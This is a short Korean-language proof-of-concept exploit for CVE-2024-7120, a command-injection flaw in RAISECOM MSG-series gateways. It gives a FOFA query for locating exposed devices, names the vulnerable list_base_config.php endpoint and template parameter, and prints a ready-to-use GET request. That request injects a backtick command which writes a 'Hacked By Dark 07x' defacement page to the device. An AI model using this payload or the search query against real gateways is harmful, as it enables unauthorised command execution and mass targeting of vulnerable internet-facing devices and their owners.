
RAISECOM Gateway 장치의 CVE-2024-7120 명령 주입 취약점에 대한 개념 증명 익스플로잇입니다. list_base_config.php의 template 매개변수를 통해 임의의 명령을 실행합니다.
RAISECOM 게이트웨이 장비에서 명령어 삽입 취약점이 확인되었으며, MSG1200, MSG2100E, MSG2200 및 MSG2300 모델에 영향을 미칩니다. 이 취약점을 통해 원격 공격자는 웹 인터페이스를 통해 시스템에서 임의의 명령을 실행할 수 있습니다. 문제는 list_base_config.php 스크립트의 template 매개변수에 있으며, 인터넷상의 25,112개 이상의 장비에 영향을 미칩니다.
✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"
URI: /vpn/list_base_config.php
설명: list_base_config.php는 VPN 구성을 관리하는 데 사용되는 RAISECOM 게이트웨이 장비의 웹 기반 인터페이스 구성 요소입니다. 확인된 취약점은 이 스크립트에서 template 매개변수를 부적절하게 처리하는 데서 발생합니다. 이 매개변수는 입력 검증이 충분하지 않아 장비 운영 체제에서 임의의 명령을 실행하는 데 악용될 수 있습니다.
CWE-77: 명령어 삽입
다음은 curl 명령을 사용하여 취약점을 악용하는 방법의 예입니다:
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Hacked By Dark 07x}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"
이 예에서 curl 명령은 list_base_config.php 스크립트에 악의적인 HTTP GET 요청을 보냅니다. 요청은 template 매개변수를 사용하여 명령을 실행합니다.